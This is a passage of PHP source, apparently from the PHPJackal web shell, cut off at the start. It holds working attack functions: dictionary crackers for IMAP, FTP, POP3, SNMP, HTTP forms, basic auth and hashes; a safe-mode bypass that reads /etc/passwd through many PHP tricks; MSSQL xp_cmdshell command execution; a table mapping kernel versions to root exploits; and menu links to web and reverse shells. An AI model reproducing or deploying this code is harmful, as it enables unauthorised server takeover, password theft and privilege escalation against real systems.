""; if(strlen($fn)>45)echo substr($fn,0,42).'...';else echo $fn;echo ''; echo $cl1."$own"; echo $cl1."$mdate"; echo $cl1."$adate"; echo "$cl1";echo "";if(is_readable($fn))echo "R";if(is_writeable($fn))echo "W";if(is_executable($fn))echo "X";if(is_uploaded_file($fn))echo "U";echo ""; echo "$cl1$size"; echo $cl2.$fileaction; echo ''; } foreach($link as $ln){ $own='Unknow'; $i++; $owner=posix_getpwuid(fileowner($ln)); $linkaction=$select.hlinK("seC=openit&namE=$ln&workingdiR=$ln")."'>Open"; $mdate=date('Y/m/d H:i:s',filemtime($ln)); $adate=date('Y/m/d H:i:s',fileatime($ln)); if($owner)$own="".$owner['name'].''; echo ''; $size=showsizE(filesize($ln)); if(($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;} if(is_writeable($ln))echo $tdw;elseif(!is_readable($ln))echo $tdnr;else echo $cl2; echo ""; if(strlen($ln)>45)echo substr($ln,0,42).'...';else echo $ln;echo ''; echo $cl1."$own"; echo $cl1."$mdate"; echo $cl1."$adate"; echo "${cl1}";echo "L";if(is_readable($ln))echo "R";if (is_writeable($ln))echo "W";if(is_executable($ln))echo "X";echo ""; echo "$cl1$size"; echo $cl2.$linkaction; echo ''; } } $dc=count($dir)-2; if($dc==-2)$dc=0; $fc=count($file); $lc=count($link); $total=$dc+$fc+$lc; $min=min(substr(ini_get('upload_max_filesize'),0,strpos(ini_get('post_max_size'),'M')),substr(ini_get('post_max_size'),0,strpos(ini_get('post_max_size'),'M'))).' MB'; echo "
NameOwnerModification timeLast changeInfoSizeActions
$table
Find:Regular expressions $hcwd
$hcwd
$et

Summery: Total: $total Directories: $dc Files: $fc Links: $lc$et$td1n$td2m$hcwd$et$td1n$td2m$hcwd$td1n Note: Max allowed file size to upload on this server is $min$et$et"; } } function imapchecK($host,$username,$password,$timeout){ $sock=fsockopen($host,143,$n,$s,$timeout); $b=uniqid('NJ'); $l=strlen($b); if(!$sock)return -1; fread($sock,1024); fputs($sock,"$b LOGIN $username $password\r\n"); $res=fgets($sock,$l+4); fclose($sock); if($res=="$b OK")return 1;else return 0; } function ftpchecK($host,$username,$password,$timeout){ $ftp=ftp_connect($host,21,$timeout); if(!$ftp)return -1; $con=ftp_login($ftp,$username,$password); if($con)return 1;else return 0; } function pop3checK($server,$user,$pass,$timeout){ $sock=fsockopen($server,110,$en,$es,$timeout); if(!$sock)return -1; fread($sock,1024); fwrite($sock,"user $user\n"); $r=fgets($sock); if($r{0}=='-')return 0; fwrite($sock,"pass $pass\n"); $r=fgets($sock); fclose($sock); if($r{0}=='+')return 1; return 0; } function formcrackeR(){ global $errorbox,$footer,$et,$hcwd; if(!empty($_REQUEST['start'])){ if(isset($_REQUEST['loG'])&& !empty($_REQUEST['logfilE'])){$log=1;$file=$_REQUEST['logfilE'];}else $log=0; $url=$_REQUEST['target']; $uf=$_REQUEST['userf']; $pf=$_REQUEST['passf']; $sf=$_REQUEST['submitf']; $sv=$_REQUEST['submitv']; $method=$_REQUEST['method']; $fail=$_REQUEST['fail']; $dic=$_REQUEST['dictionary']; $type=$_REQUEST['combo']; $user=(!empty($_REQUEST['user']))?$_REQUEST['user']:''; if(!file_exists($dic))die("$errorbox Can not open dictionary.$et$footer"); $dictionary=fopen($dic,'r'); echo 'Cracking started...
'; while(!feof($dictionary)){ if($type){ $combo=trim(fgets($dictionary)," \n\r"); $user=substr($combo,0,strpos($combo,':')); $pass=substr($combo,strpos($combo,':')+1); }else{ $pass=trim(fgets($dictionary)," \n\r"); } $url.="?$uf=$user&$pf=$pass&$sf=$sv"; $res=check_urL($url,$method,$fail,12); if(!$res){echo "U: $user P: $pass
";if($log)file_add_contentS($file,"U: $user P: $pass\r\n");if(!$type)break;} } fclose($dictionary); echo 'Done!

'; } else echo "
New:

${t}Upload:
HTTP Form cracker:
Dictionary:
Dictionary type:Simple (P)Combo (U:P)
Username:$hcwd
Action Page:
Method:
Username field name:
Password field name:
Submit name:
Submit value:
Fail string:
Log $et"; } function hashcrackeR(){ global $errorbox,$t,$et,$hcwd; if(!empty($_REQUEST['hash']) && !empty($_REQUEST['dictionary']) && !empty($_REQUEST['type'])){ if(isset($_REQUEST['loG'])&& !empty($_REQUEST['logfilE'])){$log=1;$file=$_REQUEST['logfilE'];}else $log=0; $dictionary=fopen($_REQUEST['dictionary'],'r'); if($dictionary){ $hash=strtoupper($_REQUEST['hash']); echo 'Cracking '.htmlspecialchars($hash).'...
'; $type=($_REQUEST['type']=='MD5')?'md5':'sha1'; while(!feof($dictionary)){ $word=trim(fgets($dictionary)," \n\r"); if($hash==strtoupper(($type($word)))){echo "The answer is $word
";if($log)file_add_contentS($file,"$x\r\n");break;} } echo 'Done!
'; fclose($dictionary); } else{ echo "$errorbox Can not open dictionary.$et"; } } echo "
${t}Hash cracker:
Dictionary:
Hash:
Type:
Log $hcwd $et"; } function pr0xy(){ global $errorbox,$et,$footer,$hcwd; echo "
Navigator: $hcwd$et"; if(!empty($_REQUEST['urL'])){ $u=parse_url($_REQUEST['urL']); $host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/'; $dir=dirname($file); $con=getiT($_REQUEST['urL']); $s=array("href=mailto"=>"HrEf=mailto","HREF=mailto"=>"HrEf=mailto","href='mailto"=>"HrEf=\"mailto","HREF=\"mailto"=>"HrEf=\"mailto","href=\'mailto"=>"HrEf=\"mailto","HREF=\'mailto"=>"HrEf=\"mailto","href=\"http"=>"HrEf=\"".hlinK("seC=px&urL=http"),"href=\'http"=>"HrEf=\"".hlinK("seC=px&urL=http"),"HREF=\'http"=>"HrEf=\"".hlinK("seC=px&urL=http"),"href=http"=>"HrEf=".hlinK("seC=px&urL=http"),"HREF=http"=>"HrEf=".hlinK("seC=px&urL=http"),"href=\""=>"HrEf=\"".hlinK("seC=px&urL=http://$host/$dir/"),"HREF=\""=>"HrEf=\"".hlinK("seC=px&urL=http://$host/$dir/"),"href=\""=>"HrEf=\'".hlinK("seC=px&urL=http://$host/$dir/"),'HREF="'=>'HrEf="'.hlinK("seC=px&urL=http://$host/$dir/"),"href="=>"HrEf=".hlinK("seC=px&urL=http://$host/$dir/"),"HREF="=>"HrEf=".hlinK("seC=px&urL=http://$host/$dir/")); $con=replace_stR($s,$con); echo $con; } } function sqlclienT(){ global $t,$errorbox,$et,$hcwd; if(!empty($_REQUEST['serveR']) && !empty($_REQUEST['useR']) && isset($_REQUEST['pasS']) && !empty($_REQUEST['querY'])){ $server=$_REQUEST['serveR'];$type=$_REQUEST['typE'];$pass=$_REQUEST['pasS'];$user=$_REQUEST['useR'];$query=$_REQUEST['querY']; $db=(empty($_REQUEST['dB']))?'':$_REQUEST['dB']; $res=querY($type,$server,$user,$pass,$db,$query); if($res){ $res=str_replace('|-|-|-|-|-|','',$res); $res=str_replace('|+|+|+|+|+|','
',$res); $r=explode('[+][+][+]',$res); $r[1]=str_replace('[-][-][-]',"",$r[1]); echo "
".$r[1].'
'.$r[0]."$et
"; } else{ echo "$errorbox Failed!$et
"; } } if(empty($_REQUEST['typE']))$_REQUEST['typE']=''; echo "
${t}SQL cilent:
Server:
Username:
Password:
Database:
Query:
$hcwd$et"; } function querY($type,$host,$user,$pass,$db='',$query){ $res=''; switch($type){ case 'MySQL': if(!function_exists('mysql_connect'))return 0; $link=mysql_connect($host,$user,$pass); if($link){ if(!empty($db))mysql_select_db($db,$link); $result=mysql_query($query,$link); while($data=mysql_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|'; $res.='[+][+][+]'; for($i=0;$i'; if(!empty($_REQUEST['code'])){ $s=array(''',''','?>'=>''); echo "

'; } echo "${t}Evaler:
Codes:
$hcwd$et"; } function rootxpL(){ $v=php_uname(); $db=array('2.6.17'=>'prctl3, raptor_prctl, py2','2.6.16'=>'raptor_prctl, exp.sh, raptor, raptor2, h00lyshit','2.6.15'=>'py2, exp.sh, raptor, raptor2, h00lyshit','2.6.14'=>'raptor, raptor2, h00lyshit','2.6.13'=>'kdump, local26, py2, raptor_prctl, exp.sh, prctl3, h00lyshit','2.6.12'=>'h00lyshit','2.6.11'=>'krad3, krad, h00lyshit','2.6.10'=>'h00lyshit, stackgrow2, uselib24, exp.sh, krad, krad2','2.6.9'=>'exp.sh, krad3, py2, prctl3, h00lyshit','2.6.8'=>'h00lyshit, krad, krad2','2.6.7'=>'h00lyshit, krad, krad2','2.6.6'=>'h00lyshit, krad, krad2','2.6.2'=>'h00lyshit, krad, mremap_pte','2.6.'=>'prctl, kmdx, newsmp, pwned, ptrace_kmod, ong_bak','2.4.29'=>'elflbl, expand_stack, stackgrow2, uselib24, smpracer','2.4.27'=>'elfdump, uselib24','2.4.25'=>'uselib24','2.4.24'=>'mremap_pte, loko, uselib24','2.4.23'=>'mremap_pte, loko, uselib24','2.4.22'=>'loginx, brk, km2, loko, ptrace, uselib24, brk2, ptrace-kmod','2.4.21'=>'w00t, brk, uselib24, loginx, brk2, ptrace-kmod','2.4.20'=>'mremap_pte, w00t, brk, ave, uselib24, loginx, ptrace-kmod, ptrace, kmod','2.4.19'=>'newlocal, w00t, ave, uselib24, loginx, kmod','2.4.18'=>'km2, w00t, uselib24, loginx, kmod','2.4.17'=>'newlocal, w00t, uselib24, loginx, kmod','2.4.16'=>'w00t, uselib24, loginx','2.4.10'=>'w00t, brk, uselib24, loginx','2.4.9'=>'ptrace24, uselib24','2.4.'=>'kmdx, remap, pwned, ptrace_kmod, ong_bak','2.2.25'=>'mremap_pte','2.2.24'=>'ptrace','2.2.'=>'rip, ptrace'); foreach($db as $k=>$x)if(strstr($v,$k))return $x; return 0; } function toolS(){ global $t,$hcwd,$et,$cwd; if(!empty($_REQUEST['serveR']) && !empty($_REQUEST['domaiN'])){ $ser=fsockopen($_REQUEST['serveR'],43,$en,$es,5); fputs($ser,$_REQUEST['domaiN']."\r\n"); echo '
';
while(!feof($ser))echo fgets($ser,1024);
echo '
'; fclose($ser); } elseif(!empty($_REQUEST['urL'])){ $h=''; $u=parse_url($_REQUEST['urL']); $host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/';$port=(empty($u['port']))?80:$u['port']; $ser=fsockopen($host,$port,$en,$es,5); if($ser){ fputs($ser,"GET $file\r\nHost: $host\r\n\r\n"); echo '
';
while($h!="\r\n"){$h=fgets($ser,1024);echo $h;}
echo '
'; fclose($ser); } } elseif(!empty($_REQUEST['ouT']) && isset($_REQUEST['pW'])&& !empty($_REQUEST['uN'])){ $htpasswd=$_REQUEST['ouT'].DIRECTORY_SEPARATOR.'.htpasswd'; $htaccess=$_REQUEST['ouT'].DIRECTORY_SEPARATOR.'.htaccess'; file_put_contents($htpasswd,$_REQUEST['uN'].':'.crypt(trim($_REQUEST['pW']),CRYPT_STD_DES)); file_put_contents($htaccess,"AuthName \"Secure\"\r\nAuthType Basic\r\nAuthUserFile $htpasswd\r\nRequire valid-user\r\n"); echo 'Done'; } $s="
"; echo "
${t}WhoIs:${s}Server:
domain:
$hcwd$et
${t}.ht* generator:${s}Username:
Password:
Directory:
$hcwd$et
${t}Grab header:${s}URL:
$hcwd$et
"; } function hexvieW(){ if(!empty($_REQUEST['filE'])){ $f=$_REQUEST['filE']; echo ""; $file=fopen($f,'r'); $i=-1; while(!feof($file)){ $ln=''; $i++; echo "'; echo "'; } } fclose($file); echo '
OffsetHexASCII
";echo str_repeat('0',(8-strlen($i*16))).$i*16;echo '"; for($j=0;$j<=7;$j++){ if(!feof($file)){ $tmp=strtoupper(dechex(ord(fgetc($file)))); if(strlen($tmp)==1)$tmp='0'.$tmp; echo $tmp.' '; $ln.=$tmp; } } echo ""; for($j=7;$j<=14;$j++){ if(!feof($file)){ $tmp=strtoupper(dechex(ord(fgetc($file)))); if(strlen($tmp)==1)$tmp='0'.$tmp; echo $tmp.' '; $ln.=$tmp; } } echo ""; $n=0;$asc='';$co=0; for($k=0;$k<=16;$k++){ $co=hexdec(substr($ln,$n,2)); if(($co<=31)||(($co>=127)&&($co<=160)))$co=46; $asc.=chr($co); $n+=2; } echo htmlspecialchars($asc); echo '
'; } function safemodE(){ global $windows,$t,$hcwd,$et; $file=(empty($_REQUEST['file']))?'/etc/passwd':$_REQUEST['file']; $pr="\r\nMethod "; $po=")\r\n"; $i=1; if(!empty($_REQUEST['read'])){ echo "
$pr$i:(ini_restore$po";
ini_restore('safe_mode');ini_restore('open_basedir');
readfile($file);
$i++;
echo "$pr$i:(include$po";
include($file);
$i++;
echo "$pr$i:(copy$po";
$tmp=tempnam('','cx');
copy('compress.zlib://'.$file,$tmp);
$fh=fopen($tmp,'r');
$data=fread($fh,filesize($tmp));
fclose($fh);
echo $data;
$i++;
if(function_exists('mb_send_mail')){
echo "$pr$i:(mb_send_mail$po";
if(file_exists('/tmp/mb_send_mail'))unlink('/tmp/mb_send_mail');
mb_send_mail(NULL, NULL, NULL, NULL,'-C $file -X /tmp/mb_send_mail');
readfile('/tmp/mb_send_mail');
$i++;
}
if(function_exists('curl_init')){
echo "$pr$i:(curl_init [A]$po";
$fh=curl_init('file://'.$file.'');
$tmp=curl_exec($fh);
echo $tmp;
$i++;
echo "$pr$i:(curl_init [B]$po";
$i++;
if(strstr($file,DIRECTORY_SEPARATOR))$ch=curl_init('file:///'.$file."\x00/../../../../../../../../../../../../".__FILE__);
else $ch=curl_init('file://'.$file."\x00".__FILE__);
var_dump(curl_exec($ch));
}
if(is_writable('.')){
echo "$pr$i:(php.ini$po";
file_put_contents('php.ini','safe_mode = Off');
readfile($file);
unlink('php.ini');
$i++;
}
if(extension_loaded('perl')){
echo "$pr$i:(perl$po"; 
echo perlshelL("type \"$file\"");
$i++;
}
if(is_object($ws=new COM('WScript.Shell'))){
echo "$pr$i:(COM$po";
echo comshelL("type \"$file\"",$ws);
$i++;
}
if(extension_loaded('ffi') && $windows){
echo "$pr$i:(FFI$po";
echo ffishelL("type \"$file\"");
$i++;
}
if(checkfunctioN('win_shell_execute')){
echo "$pr$i:(win32std$po";
echo winshelL("type \"$file\"");
$i++;
}
if(checkfunctioN('win32_create_service')){
echo "$pr$i:(win32service$po";
echo srvshelL("type \"$file\"");
$i++;
}
if(function_exists('imap_open')){
echo "$pr$i:(imap [A]$po";
$str=imap_open('/etc/passwd','','');
$list=imap_list($str,$file,'*');
for($i=0;$i";
}
elseif(!empty($_REQUEST['show'])){
echo "
$pr$i:(glob$po";
$con=glob("$file*");
foreach ($con as $v)echo "$v\n";
$i++;
if(function_exists('imap_open')){
echo "$pr$i:(imap$po";
$str=imap_open('/etc/passwd','','');
$s=explode("|",$file);
if(count($s)>1)$list=imap_list($str,trim($s[0]),trim($s[1]));else $list=imap_list($str,trim($str[0]),'*');
for($i=0;$i";
}
elseif(!empty($_REQUEST['sql'])){
$ta=uniqid('N');
$s=array("CREATE TEMPORARY TABLE $ta (file LONGBLOB)","LOAD DATA INFILE '".addslashes($_REQUEST['file'])."' INTO TABLE $ta","SELECT * FROM $ta");
$l=mysql_connect('localhost', $_REQUEST['user'], $_REQUEST['pass']);
mysql_select_db($_REQUEST['db'],$l);
echo '
';
foreach($s as $v){
$q = mysql_query($v,$l);
while($d=mysql_fetch_row($q))echo htmlspecialchars($d[0]);
}
echo '
'; } elseif(!empty($_REQUEST['serveR']) && !empty($_REQUEST['coM']) && !empty($_REQUEST['dB']) && !empty($_REQUEST['useR']) && isset($_REQUEST['pasS'])){ $res=''; $tb=uniqid('NJ'); $db=mssql_connect($_REQUEST['serveR'],$_REQUEST['useR'],$_REQUEST['pasS']); mssql_select_db($_REQUEST['dB'],$db); mssql_query("create table $tb ( string VARCHAR (500) NULL)",$db); mssql_query("insert into $tb EXEC master.dbo.xp_cmdshell '".$_REQUEST['coM']."'",$db); $re=mssql_query("select * from $tb",$db); while(($row=mssql_fetch_row($re))) { $res.= $row[0]."\r\n"; } mssql_query("drop table $tb",$db); mssql_close($db); echo "

"; } $f=(!empty($_REQUEST['file']))?htmlspecialchars($_REQUEST['file']):'/etc/passwd'; $u=(!empty($_REQUEST['user']))?htmlspecialchars($_REQUEST['user']):'root'; $p=(!empty($_REQUEST['pass']))?htmlspecialchars($_REQUEST['pass']):'123456'; $d=(!empty($_REQUEST['db']))?htmlspecialchars($_REQUEST['db']):'test'; echo "
${t}Use PHP Bugs:
File:
$hcwd$et
${t}Use MySQL:
File:
Username:
Password:
Database:
$hcwd$et
${t}MSSQL Exec:
Server:
Username:
Password:
Command:
Database:      $hcwd$et"; } function crackeR(){ global $errorbox,$t,$et,$crack,$cwd; $check=(!empty($_REQUEST['dictionary']) && !empty($_REQUEST['target']))?1:0; if(!empty($_REQUEST['cracK']) && !$check){ $c=htmlspecialchars($_REQUEST['cracK']); echo "
$t$c cracker:$crack"; } elseif(!empty($_REQUEST['cracK']) && $check){ $pro=strtolower($_REQUEST['cracK']).'checK'; $target=$_REQUEST['target']; $type=$_REQUEST['combo']; $user=(!empty($_REQUEST['user']))?$_REQUEST['user']:''; $dictionary=fopen($_REQUEST['dictionary'],'r'); if(isset($_REQUEST['loG'])&& !empty($_REQUEST['logfilE'])){$log=1;$file=$_REQUEST['logfilE'];}else $log=0; if($dictionary){ echo 'Cracking '.htmlspecialchars($target).'...
'; while(!feof($dictionary)){ if($type){ $combo=trim(fgets($dictionary)," \n\r"); $user=substr($combo,0,strpos($combo,':')); $pass=substr($combo,strpos($combo,':')+1); }else{ $pass=trim(fgets($dictionary)," \n\r"); } $ret=$pro($target,$user,$pass,5); if($ret==-1){echo "$errorbox Can not connect to server.$et";break;}else{ if($ret){$x="U: $user P: $pass";echo "$x
";if($log)file_add_contentS($file,"$x\r\n");if(!$type)break;}} } echo '
Done
'; fclose($dictionary); } else{ echo "$errorbox Can not open dictionary.$et"; } } else{ echo "
$hcwd
[Hash] - [SMTP] - [POP3] - [IMAP] - [FTP] - [SNMP] - [MySQL] - [MSSQL] - [HTTP Form] - [HTTP Auth(basic)] - [Dictionary maker]$et"; } } function snmpcrackeR(){ global $t,$et,$errorbox,$hcwd; if(!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){ $target=$_REQUEST['target']; if(isset($_REQUEST['loG'])&& !empty($_REQUEST['logfilE'])){$log=1;$file=$_REQUEST['logfilE'];}else $log=0; $dictionary=fopen($_REQUEST['dictionary'],'r'); if($dictionary){ echo 'Cracking '.htmlspecialchars($target).'...
'; while(!feof($dictionary)){ $com=trim(fgets($dictionary)," \n\r"); $res=snmpchecK($target,$com,2); if($res){echo "$com
";if($log)file_add_contentS($file,"$com\r\n");} } echo '
Done
'; fclose($dictionary); } else{ echo "$errorbox Can not open dictionary.$et"; } }else echo "
${t}SNMP cracker:
Dictionary:
Server:
Log $et"; } function dicmakeR(){ global $errorbox,$windows,$footer,$t,$et,$hcwd; $combo=(empty($_REQUEST['combo']))?0:1; if(!empty($_REQUEST['range'])&& !empty($_REQUEST['output']) && !empty($_REQUEST['min']) && !empty($_REQUEST['max'])){ $min=$_REQUEST['min']; $max=$_REQUEST['max']; if($max<$min)die($errorbox."Bad input!$et".$footer); $s=$w=''; $out=$_REQUEST['output']; $r=$_REQUEST['range']; $dic=fopen($out,'w'); if($r==1){ for($s=pow(10,$min-1);$sDone'; } elseif(!empty($_REQUEST['input']) && !empty($_REQUEST['output'])){ $input=fopen($_REQUEST['input'],'r'); if(!$input){ if($windows)echo $errorbox.'Unable to read from '.htmlspecialchars($_REQUEST['input'])."$et
"; else{ $input=explode("\n",shelL("cat $input")); $output=fopen($_REQUEST['output'],'w'); if($output){ foreach($input as $in){ $user=$in; $user=trim(fgets($in)," \n\r"); if(!strstr($user,':'))continue; $user=substr($user,0,(strpos($user,':'))); if($combo)fwrite($output,$user.':'.$user."\n");else fwrite($output,$user."\n"); } fclose($input);fclose($output); echo 'Done'; } } } else{ $output=fopen($_REQUEST['output'],'w'); if($output){ while(!feof($input)){ $user=trim(fgets($input)," \n\r"); if(!strstr($user,':'))continue; $user=substr($user,0,(strpos($user,':'))); if($combo)fwrite($output,$user.':'.$user."\n");else fwrite($output,$user."\n"); } fclose($input);fclose($output); echo 'Done'; } else echo $errorbox.' Unable to write data to '.htmlspecialchars($_REQUEST['input'])."$et
"; } }elseif(!empty($_REQUEST['url']) && !empty($_REQUEST['output'])){ $res=downloadiT($_REQUEST['url'],$_REQUEST['output']); if($combo && $res){ $file=file($_REQUEST['output']); $output=fopen($_REQUEST['output'],'w'); foreach($file as $v)fwrite($output,"$v:$v\n"); fclose($output); } echo 'Done'; }else{ $temp=whereistmP().DIRECTORY_SEPARATOR; echo "
${t}Wordlist generator:
Range:
Min lenght:
Max lenght:
Output:
Combo style output
$hcwd$et
${t}Grab dictionary:
Grab from:
Output:
Combo style output
$hcwd$et
${t}Download dictionary:
URL:
Output:
Combo style output
$hcwd$et";} } function ftpclienT(){ global $t,$cwd,$hcwd,$errorbox,$et; $td=""; if(!empty($_REQUEST['hosT']) && !empty($_REQUEST['useR']) && isset($_REQUEST['pasS']) && function_exists('ftp_connect')){ $user=$_REQUEST['useR'];$pass=$_REQUEST['pasS'];$host=$_REQUEST['hosT']; $con=ftp_connect($_REQUEST['hosT'],21,10); if($con){ $ftp=ftp_login($con,$user,$pass); if($ftp){ if(!empty($_REQUEST['PWD']))ftp_chdir($con,$_REQUEST['PWD']); if(!empty($_REQUEST['filE'])){ $file=$_REQUEST['filE']; $mode=(isset($_REQUEST['modE']))?FTP_BINARY:FTP_ASCII; if(isset($_REQUEST['geT']))ftp_get($con,$file,$file,$mode); elseif(isset($_REQUEST['puT']))ftp_put($con,$file,$file,$mode); elseif(isset($_REQUEST['rM'])){ ftp_rmdir($con,$file); ftp_delete($con,$file); } elseif(isset($_REQUEST['mD']))ftp_mkdir($con,$file); } $pwd=ftp_pwd($con); $dir=ftp_nlist($con,''); $d=opendir($cwd); echo "${td}Server:${td}Client:$td$td$td"; foreach($dir as $n)echo "$n
"; echo "$td";while($cdir=readdir($d))if($cdir!='.' && $cdir!='..')echo "$cdir
"; echo "${td}Name:Binary $td$et"; }else echo "$errorbox Wrong username or password$et"; }else echo "$errorbox Can not connect to server!$et"; } else{ echo "
${t}FTP cilent:
Server:
Username:
Password:
$hcwd$et"; } } function calC(){ global $t,$et,$hcwd; $fu=array('-','md5','sha1','crc32','hex','ip2long','decbin','dechex','hexdec','bindec','long2ip','base64_encode','base64_decode','urldecode','urlencode','des','strrev'); if(!empty($_REQUEST['input']) && (in_array($_REQUEST['to'],$fu))){ $to=$_REQUEST['to']; echo "
${t}Output:
$et

"; } echo "
${t}Convertor:
Input:
Task:
$hcwd$et"; } function authcrackeR(){ global $errorbox,$et,$t,$hcwd; if(!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){ if(isset($_REQUEST['loG'])&& !empty($_REQUEST['logfilE'])){$log=1;$file=$_REQUEST['logfilE'];}else $log=0; $data=''; $method=($_REQUEST['method'])?'POST':'GET'; if(strstr($_REQUEST['target'],'?')){$data=substr($_REQUEST['target'],strpos($_REQUEST['target'],'?')+1);$_REQUEST['target']=substr($_REQUEST['target'],0,strpos($_REQUEST['target'],'?'));} spliturL($_REQUEST['target'],$host,$page); $type=$_REQUEST['combo']; $user=(!empty($_REQUEST['user']))?$_REQUEST['user']:''; if($method=='GET')$page.=$data; $dictionary=fopen($_REQUEST['dictionary'],'r'); echo ''; while(!feof($dictionary)){ if($type){ $combo=trim(fgets($dictionary)," \n\r"); $user=substr($combo,0,strpos($combo,':')); $pass=substr($combo,strpos($combo,':')+1); }else{ $pass=trim(fgets($dictionary)," \n\r"); } $so=fsockopen($host,80,$en,$es,5); if(!$so){echo "$errorbox Can not connect to host$et";break;} else{ $packet="$method /$page HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nConnection: Close\r\nAuthorization: Basic ".base64_encode("$user:$pass"); if($method=='POST')$packet.='Content-Type: application/x-www-form-urlencoded\r\nContent-Length: '.strlen($data); $packet.="\r\n\r\n"; $packet.=$data; fputs($so,$packet); $res=substr(fgets($so),9,2); fclose($so); if($res=='20'){echo "U: $user P: $pass
";if($log)file_add_contentS($file,"U: $user P: $pass\r\n");} } } echo 'Done!
'; }else echo "
${t}HTTP Auth cracker:
Dictionary:
Dictionary type:Simple (P)Combo (U:P)
Username:
Server:
Log $hcwd $et"; } function openiT($name){ $ext=strtolower(substr($name,strrpos($name,'.')+1)); $src=array('php','php3','php4','phps','phtml','phtm','inc'); if(in_array($ext,$src))highlight_file($name); else echo '
'.htmlspecialchars(file_get_contents($name)).'
'; } function opensesS($name){ $sess=file_get_contents($name); $var=explode(';',$sess); echo "
Name\tType\tValue\r\n";
foreach($var as $v){
$t=explode('|',$v);
$c=explode(':',$t[1]);
$y='';
if($c[0]=='i')$y='Integer';elseif($c[0]=='s')$y='String';elseif($c[0]=='b')$y='Boolean';elseif($c[0]=='f')$y='Float';elseif($c[0]=='a')$y='Array';elseif($c[0]=='o')$y='Object';elseif($c[0]=='n')$y='Null';
echo $t[0]."\t$y\t".$c[1]."\r\n";
}
echo '
'; } function logouT(){ setcookie('passw','',time()-10000); header('Location: '.hlinK()); } ?> PHPJackal [<?php echo $cwd; ?>]
[Back] - ">[Info] - ">[File manager] - ">[Editor] - ">[Web shell] - ">[B/R shell] - ">[Safe-mode] - ">[SQL] - ">[FTP] - ">[Mail] - ">[Evaler] - ">[Scanners] - ">[Crackers] - ">[Pr0xy] - ">[Tools] - ">[Convert] - ">[About] Logout]";?>